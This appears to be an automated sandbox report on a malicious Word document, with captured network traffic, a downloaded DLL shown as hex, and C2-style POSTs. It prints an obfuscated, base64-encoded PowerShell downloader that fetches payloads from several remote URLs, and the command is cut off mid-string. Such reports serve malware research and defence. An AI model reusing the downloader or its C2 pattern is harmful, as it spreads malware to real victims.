Jan 6, 2021 08:41:31.311084032 CET	22	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jan 2021 07:41:31 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=60 X-Powered-By: PHP/7.4.9 Set-Cookie: 5ff569ab4dc03=1609918891; expires=Wed, 06-Jan-2021 07:42:31 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Wed, 06 Jan 2021 07:41:31 GMT Expires: Wed, 06 Jan 2021 07:41:31 GMT Content-Disposition: attachment; filename="rJGdausK.dll" Content-Transfer-Encoding: binary Data Raw: 31 64 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
Jan 6, 2021 08:41:31.311109066 CET	24	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U
Jan 6, 2021 08:41:31.311125040 CET	25	IN	Data Raw: cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 00 03 de 6a 14 53 Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1y
Jan 6, 2021 08:41:31.311141014 CET	26	IN	Data Raw: 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f 85 c0 74 0e 68 00 Data Ascii: ut\|~tN@(jjQ~t:W39~~Ftv(PF$G;~\|F_thjPFthjPVjxPt^]UEHMx\|ujl3]PxDUEtztSVuWuB;r]+rr Z$3
Jan 6, 2021 08:41:31.311157942 CET	28	IN	Data Raw: 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 00 01 0c 18 8b 07 Data Ascii: ]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPFN
Jan 6, 2021 08:41:31.311177015 CET	29	IN	Data Raw: 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 08 00 00 00 00 8b Data Ascii: ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3
Jan 6, 2021 08:41:31.311192036 CET	29	IN	Data Raw: 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 50 ff 91 bc 00 00 Data Ascii: ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWX
Jan 6, 2021 08:41:31.311208010 CET	31	IN	Data Raw: 32 30 30 30 0d 0a d3 00 10 bf 05 00 00 00 90 56 8b cb e8 c8 01 00 00 83 c6 0c 4f 75 f2 8b cb e8 1b 00 00 00 8b cb e8 74 03 00 00 8b 45 fc 5f 5e 5b 8b e5 5d c3 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 5c a1 58 21 01 10 33 c5 89 45 fc 8b c1 8d Data Ascii: 2000VOutE_^[]3[]U\X!3EME@QEhPLEEVURPQ %W39}SlEUREWPQEEURhPEUWRfEf
Jan 6, 2021 08:41:31.311223984 CET	32	IN	Data Raw: f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 f6 79 86 8b c6 8b Data Ascii: xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRPv
Jan 6, 2021 08:41:31.311242104 CET	33	IN	Data Raw: 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b f0 85 f6 7e 0b 0f Data Ascii: x=wuz3fEuPujPS~xLju=jh\|WthWuhWtjM_^3[R]UX!3EES]VEW}
Jan 6, 2021 08:41:31.577723026 CET	35	IN	Data Raw: 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76 Data Ascii: ^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v\|ovfsvs~vf;u

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	5.2.136.90	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:41:52.162594080 CET	221	OUT	POST /gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/ Content-Type: multipart/form-data; boundary=-------------------HmagTJdPQZ43LVgAX2L User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 5684 Connection: Keep-Alive Cache-Control: no-cache
Jan 6, 2021 08:41:52.162730932 CET	223	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 6d 61 67 54 4a 64 50 51 5a 34 33 4c 56 67 41 58 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 Data Ascii: ---------------------HmagTJdPQZ43LVgAX2LContent-Disposition: form-data; name="MEoKFWWVB"; filename="qbOdAjHgYWb"Content-Type: application/octet-streamo6*hyfQp'Dc`nd%,9h_Xc
Jan 6, 2021 08:41:52.234513044 CET	227	OUT	Data Raw: 66 3a 8d 8f 4a 78 da 33 5b e8 f9 2d ea 40 ff c6 fe 53 a3 94 da 64 72 a2 98 ca d8 10 34 63 ff 77 a1 89 00 a4 4f 63 87 de 44 9f ab 0b 84 46 09 49 d6 30 11 55 5e 23 b0 2f 78 d1 47 68 5e f6 41 36 5d 6e 77 7f 1b 84 15 2c c7 fa 53 b1 cd 41 82 01 5f 7e Data Ascii: f:Jx3[-@Sdr4cwOcDFI0U^#/xGh^A6]nw,SA_~maDK[c?\R{`p(WE2Hy-z)2.\|"Am8xgcW,AG8Fub:PFGRE@eY'!Q46&c]s
Jan 6, 2021 08:41:52.874428034 CET	229	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jan 2021 07:41:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 37 34 0d 0a 95 93 12 d5 c8 b4 02 10 8a 24 40 39 c3 ca 75 da 33 35 c8 f7 ad 44 d5 87 e6 94 39 f2 3a ab b5 e8 06 f8 6f ea 53 e2 8e 5e d1 23 c4 42 4f 5e d7 cd 8b e8 0a d0 2b 58 3a cb 45 4e c4 59 3e 72 80 fa 3a e5 d8 01 be d0 bd e8 68 13 d9 79 82 4d 44 06 3f 60 7f d8 d4 b1 aa 83 6f c3 16 96 16 fc 9a 6d cb 41 f7 5a 14 9e a4 af fa a7 f6 b4 d0 c1 43 90 57 3b 7d a6 06 75 74 79 d6 4b d4 20 2f c0 52 42 3f 36 68 27 7c 8e a1 f3 3b e8 f7 fb fc 5e d1 7b f1 04 82 6c eb 66 6a cd 9e f1 cb f9 cd 80 e7 dd e0 bf d4 81 2e 22 14 fe 94 56 2e 64 b4 b5 a5 70 87 05 0c d2 e6 9d be a5 78 59 2a 37 65 f1 6b ea 79 ca 04 35 5d 6a df 3f b1 92 69 32 b2 39 3e f4 4a 73 71 bc 70 25 b9 21 f9 4b cf 78 94 cf 60 2c 9a 4d 74 8b c1 bd 51 85 28 8d d9 58 43 47 2f 5f 7d fd a5 60 1e 2b 97 23 55 8d 21 58 ce c8 f3 a5 45 c1 b7 11 a0 53 ac e6 90 22 95 27 f1 ab b1 80 4e dd 07 38 9d 3c 56 51 6a d2 98 cc ad 3b 2f 6b a3 45 40 2a ee 80 61 02 38 6e 56 6c 93 79 a5 40 6a 67 ef 91 52 ea c8 a5 a4 06 0e f1 d1 35 c1 8f c4 4f e8 47 8f 54 ff 23 e8 51 3e 6e 65 aa 44 4b e9 30 f1 b1 95 af 42 56 1d aa 15 cb 09 37 26 cd a7 24 47 70 d0 f9 5a 15 50 9c 57 a1 1e d7 0c b2 17 8f ce 6e a8 85 69 95 32 46 d5 03 cc 8d 34 fb d6 92 e9 1c 6d 1a ef 85 bf 78 6f c2 d6 22 29 c7 e1 ff 15 a5 6b 36 cc 51 4c a1 72 11 a0 21 11 7e 1d 40 af f5 ae 9b b9 98 63 8b 78 f3 59 71 4c 5d fb 84 af 93 c7 fc 2a 3c 07 7f c3 42 cb d7 08 c4 6b ce 7b b6 8b 76 d7 44 0c a6 f3 86 38 4e 65 1a 7d 52 04 b0 47 75 b7 43 32 54 ba 26 20 81 a0 7c ec e5 a3 fa 3c 4a e0 01 5c a1 cc b2 e6 4e 4b 04 23 5d af 81 26 3e f6 27 ab 6e c0 42 37 3c 39 30 a2 bf 0c d1 c2 40 09 ab 36 1f 6c 7b f8 fa 84 05 f4 bb df ee 11 d3 12 9c 69 b3 b4 26 3f 2b a5 16 f7 9f 74 74 e1 0b b8 ac 28 3f df 35 88 fa b4 09 7a 14 7a 20 33 77 f4 f4 ed f7 15 f9 7d 4a c4 00 ee eb fa ee 5c d4 40 21 7d b4 f1 83 0a 5b a6 33 d5 2f 89 ea fa 3c 12 f7 e8 c6 58 eb 5a f9 38 c4 49 b8 b1 51 05 0d 3e ce 08 97 d3 76 20 d8 c3 eb 13 d5 6a 23 43 ee ae a4 b2 d6 3a 5a 03 a0 11 a8 e4 a8 53 31 12 35 15 1b ec 02 64 18 5e 3f 1a bf bb f7 4f 49 e8 37 e4 1d a1 23 b0 cb 39 93 dd 98 20 71 5d e8 f7 45 10 a0 78 03 16 e2 81 ae fd a4 51 fb a8 af fd 27 fd f1 f2 27 f9 40 d9 bf 62 fe 10 05 5b 1a 35 fc 30 a5 90 31 a2 b1 c2 52 72 d9 17 c1 01 3c 20 6a a6 d2 fa 2b 32 f3 92 9c 6c cc 6c 79 d4 0d bc 26 65 50 ce 04 52 b7 09 5b 0f 2b 86 64 21 d2 29 b6 7d c8 6a 1b 51 1e 25 ac 87 b0 9f e6 3a 93 fe 52 e7 c5 0d c4 69 83 d0 90 58 5d 78 ba 41 e4 36 cf f8 35 02 e1 6e 0e ec 50 7d b1 3b 40 2a 1b 58 9f a0 95 d4 36 37 29 5a 14 41 36 8e fb ed 82 72 d2 a6 44 5a 87 5b d8 6e f8 8f e5 bf 40 33 a2 8a 57 4b 8c d9 a0 67 c7 75 70 bb be db 39 ac 9e 6b b8 4f 0b 66 07 47 17 10 45 71 e6 35 19 ae 34 fb 89 4a 41 a3 68 8e bb a1 69 75 2e 27 42 1f 67 d9 79 35 7c 66 b6 66 2b 47 45 89 67 c6 df 65 59 19 06 c2 e6 d8 3e f7 62 32 94 81 87 57 e6 8c 5e 14 a8 e3 dc bf 41 8d 89 68 e6 b7 e1 a6 96 16 cb ff 0e b3 01 e4 9a 05 89 9b 54 bc 14 62 b8 30 24 f2 bf ab 4b 93 d5 22 98 67 85 97 5c ab 6b cf de 5c 6f d4 de b8 c0 f1 7a 71 0d c6 aa 29 ff 96 98 0e 54 c1 e8 29 46 18 5b c3 79 f7 56 54 d7 64 45 5b f2 c5 bb 5c a5 b8 54 09 27 99 56 5a f5 47 5c 8c c5 8b 29 76 87 85 d0 b4 a6 6c 4f 89 2a d9 38 24 5f 7b 06 4d b7 4f 17 45 11 ce d2 91 44 3c 72 8c d9 28 b7 ce 07 dc 55 8e 60 da f2 c9 74 17 71 21 a2 7e d3 10 c0 13 73 4c 98 66 94 e1 0c 54 14 3d 11 29 0c 4a e1 4e c9 53 5d 5e ac db bd 55 c0 28 82 63 a6 5f 69 50 24 00 c8 76 a7 9f e3 b7 fb eb 1f 62 53 a5 ac 46 b8 01 3a bb 68 b0 ce e4 c1 b6 d2 4e cb 33 a7 70 7f 78 e7 08 cc 8b 61 48 47 e1 9d 9c 83 a9 69 6e Data Ascii: b74$@9u35D9:oS^#BO^+X:ENY>r:hyMD?`omAZCW;}utyK /RB?6h'\|;^{lfj."V.dpxY7eky5]j?i29>Jsqp%!Kx`,MtQ(XCG/_}`+#U!XES"'N8<VQj;/kE@a8nVly@jgR5OGT#Q>neDK0BV7&$GpZPWni2F4mxo")k6QLr!~@cxYqL]<Bk{vD8Ne}RGuC2T& \|<J\NK#]&>'nB7<90@6l{i&?+tt(?5zz 3w}J\@!}[3/<XZ8IQ>v j#C:ZS15d^?OI7#9 q]ExQ''@b[501Rr< j+2lly&ePR[+d!)}jQ%:RiX]xA65nP};@X67)ZA6rDZ[n@3WKgup9kOfGEq54JAhiu.'Bgy5\|ff+GEgeY>b2W^AhTb0$K"g\k\ozq)T)F[yVTdE[\T'VZG\)vlO*8$_{MOED<r(U`tq!~sLfT=)JNS]^U(c_iP$vbSF:hN3pxaHGin
Jan 6, 2021 08:41:52.875452995 CET	230	IN	Data Raw: 7c 98 14 bf 8a 7b c2 bf 00 c3 d3 0b c6 c8 06 be ab 9a d8 94 30 c7 45 9c 30 4f 1c cb b0 ae ae 31 b3 1b 39 83 d8 e9 9b c6 fa 12 75 34 75 ea c4 86 af a4 67 ae da 4d b6 13 f7 81 7b cb aa 7c 20 1c 86 56 9e 69 0c ed 1b fc 05 a0 2e 93 33 43 e5 47 57 e8 Data Ascii: \|{0E0O19u4ugM{\| Vi.3CGWxq3q28BZJr#%w_IJzaN9")83X):sllV``:kP-H,,'Ttse1-$P_[T)PE\/,?70
Jan 6, 2021 08:41:52.947520971 CET	231	IN	Data Raw: bf e6 30 5d 16 1b 98 c4 d2 df ef 6a 8b 54 82 9e da 8c 68 47 29 d1 b6 9f 2e 92 0c 00 21 a8 bb 2e 0b 33 0a 71 12 40 a0 16 de 20 87 c0 7a 3a 19 37 ae ca 61 71 be 49 20 ac 5c 6b eb 25 8e 58 e8 df 19 86 cc b4 c3 4b b7 3d 66 25 87 4b 2f 9e 79 a2 c1 a7 Data Ascii: 0]jThG).!.3q@ z:7aqI \k%XK=f%K/yHc)+t?i"6&.Y(:uz5A!5lruvxrJ^(655tB/jtww{y>7r1'!Vk,dD!@)_q<

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2292 Parent PID: 584

General

Start time:	08:41:40
Start date:	06/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f9e0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2424 Parent PID: 1220

General

Start time:	08:41:42
Start date:	06/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAH